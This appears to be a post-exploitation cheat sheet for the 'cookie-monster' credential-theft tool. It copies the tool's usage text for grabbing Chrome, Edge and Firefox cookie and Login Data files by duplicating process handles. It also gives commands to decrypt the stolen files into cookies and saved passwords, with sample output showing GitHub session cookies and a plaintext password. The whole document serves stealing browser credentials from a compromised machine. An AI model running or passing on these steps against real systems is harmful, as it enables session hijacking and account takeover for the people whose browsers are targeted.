后渗透 - Dump cookie

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] cookie-monster Example:    cookie-monster --chrome    cookie-monster --edge    cookie-moster --firefox    cookie-monster --chromeCookiePID 1337   cookie-monster --chromeLoginDataPID 1337   cookie-monster --edgeCookiePID 4444   cookie-monster --edgeLoginDataPID 4444cookie-monster Options:     --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD     --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD     --firefox, looks for profiles.ini and locates the key4.db and logins.json file     --chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file      --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

Cookie Monster Example:  cookie-monster.exe --all Cookie Monster Options:  -h, --help                     Show this help message and exit  --all                          Run chrome, edge, and firefox methods  --edge                         Extract edge keys and download Cookies/Login Data file to PWD  --chrome                       Extract chrome keys and download Cookies/Login Data file to PWD  --firefox                      Locate firefox key and Cookies, does not make a copy of either file

pip3 install -r requirements.txt

python3 base64-encode.py "xecxfc...."

python .decrypt.py "XHh..." --cookies ChromeCookie.dbResults Example:-----------------------------------Host: .github.comPath: /Name: dotcom_userCookie: KingOfTheNOPsExpires: Oct 28 2024 21:25:22Host: github.comPath: /Name: user_sessionCookie: x123.....Expires: Nov 11 2023 21:25:22

python .decrypt.py "XHh..." --passwords ChromePasswords.dbResults Example:-----------------------------------URL: https://test.com/Username: testerPassword: McTesty